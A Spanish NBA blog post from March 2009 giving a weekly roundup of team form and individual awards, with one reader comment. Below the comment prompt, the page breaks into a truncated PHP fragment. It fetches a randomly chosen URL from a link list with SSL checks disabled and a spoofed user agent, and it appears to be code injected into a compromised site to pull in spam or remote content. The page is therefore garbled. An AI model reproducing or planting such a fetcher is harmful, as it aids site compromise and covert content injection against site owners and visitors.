INFORME SEMANAL TJNBA (Semana 21)

23 de March de 2009 por MagicJohnson32

TheDeerHunter & MagicJohnson32

Quitando los equipos que ya están fuera matemáticamente de la postemporada, prácticamente puede pasar de todo en este tramo final de liga. Ni siquiera Cavs o Lakers tienen ni la más remota idea de la naturaleza del cruce que les puede tocar en suerte en primera ronda y mucho menos del cuadro en sí. El resto todavía menos. Lo que sí parece cierto es que la mayoría de equipos con verdaderas aspiraciones se han puesto las pilas y eso se nota en los balances de la semana.

ON FIRE:

Los reyes de este tramo final de liga son indiscutiblemente los Cavs. De la mano de un Lebron ultramotivado por la caza de su primer MVP, lo ganan prácticamente todo sobre todo en su cancha, que se está convirtiendo en el nuevo infierno del Este. Es cierto que no deslumbran pero ningún seguidor podría quejarse de lo que están viendo este año y lo que te rondaré morena.

En esa misma línea el petardazo de esta semana. Houston quitándole el liderato de la Southwest a San Antonio pero con un cruce con Utah en primera ronda en el punto de mira. Todo un premio envenenado para ellos.

Con ellos, Denver y Phoenix, beneficiados por un calendario favorable para maquillar su situación. Todo vale para coger moral.

AL TRAN TRAN:

Si el tropezón en casa contra Philadelphia es ilustrativo de todos los defectos de Lakers, la remontada contra los Bulls lo es de sus virtudes. Todo esto y el asunto Bynum enturbian completamente lo que debería ser un final plácido de regular. La parte baja de los playoffs por el Oeste (NO, Portland, Utah y Dallas) pelea sin demasiada alegría por evitarles a ellos ya que el resto de enfrentamientos tampoco son caramelos precísamente.

Con la recuperación de la plantilla de los actuales campeones se presenta un duelo final apasionante entre Boston y Orlando. Importantísimo el resultado, sobretodo teniendo en cuenta que se enfrentarán muy posiblemente en segunda ronda. Otro duelo precioso es el del acoso de los Heat a la 4ª plaza para conseguir la ventaja de campo en primera ronda contra Atlanta. Por ahí se le está escurriendo el MVP a Wade. Philadelphia y Detroit se pegan, pero menos, por no saber muy bien quién preferirán que los elimine en primera ronda. Muchos números para Detroit de perder cualquier guerra.

Algunos sin nada que ganar como Warriors o Thunder, han completado una buena semana con buenos partidos y destacadas victorias, como por ejemplo, contra Philadelphia o San Antonio.

EL BORDE DEL ABISMO:

Popovic puede decir misa en Do menor pero hacer una semana como la que ha hecho con todo la que está cayendo insinuando que todo lo arreglará la vuelta de Manudo es como mínimo bastante irresponsable. Haria bien San Antonio en no caer demasiado. Después, levantar cada desventaja en campo extra pesa lo suyo en las piernas.

La pelea entre Chicago y Charlotte también está resultando apasionante. Ocasiones han tenido, uno de escaparse y el otro de pillarlos, esta misma semana. No olvidemos a Milwaukee de tapados ni a los Nets que vienen haciendo la goma. Mucho nos tememos que Indiana y New York estén gastando sus últimos cartuchos en la pelea.

L POZO:

Los Raptors todavía no han caído definitivamente al pozo pero si tenían alguna remota esperanza (que ya dijo Calderón el otro día que nones) va y se les lesiona Bargnani. Quién hubiera adivinado que él iba a ser uno de los mejores de esta temporada. Cómo habrán estado los demás.

El resto, Wizards, Grizzlies, Timberwolves, Clippers y Sacramento han juntado fuerzas para lograr entre todos un sensacional parcial de 2-18. Para los objetivos que ellos persiguen no está mal. Si fuera Ricky me estaría cortando las venas por el pedazo de panorama que se le avecina. Un buen argumento para seguir un año más aquí.

PREMIOS SEMANALES

MVP: Los Cavs siguen a velocidad de crucero de la mano de su jugador franquicia. Esta última semana, LeBron ha vuelto a rondar el triple doble con 30.3 puntos, 10.3 rebotes y 7.8 asistencias de media.

El rookie: Pese a ver cortada ante los Lakers su racha de triunfos, Derrick Rose y los Bulls funcionan. El rookie ha firmado esta semana 20.3 puntos con casi un 60% de acierto, además de 5 asistencias y 4.7 rebotes de media.

La sorpresa: Le ha costado pero esta semana Jason Richardson se ha parecido al jugador que esperábamos en los Suns. Ha logrado 30 puntos de media con un porcentaje de acierto del 67%, incluyendo un 12 de 21 en triples. Su equipo lo ha agradecido y ya suman 4 victorias consecutivas. Un caso similar es el de John Salmons, también traspasado durante la temporada y que ha protagonizado una semana de un enorme acierto anotador (29.3 puntos con un 64%).

La decepción: El otrora Mr Triple Doble, Jason Kidd, aún sigue produciendo en todas las categorías estadísticas pero a un nivel bajísimo. Esta semana Kidd ha promediado 6.7 puntos, 6.7 rebotes, 5.7 asistencias y 2.7 robos en 3 partidos, y lo ha hecho anotando únicamente un 27% de sus tiros de campo.

Comenta

Un comentario a esta entrada

  1. aro_pasado_no_newtoniano dice:
    #1

    No sé la razón, pero Loncar llevaba una camiseta donde se podia leer “Beat L.A.” ¿Qué posibilidad hay de que hablaramos de los Clippers?

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>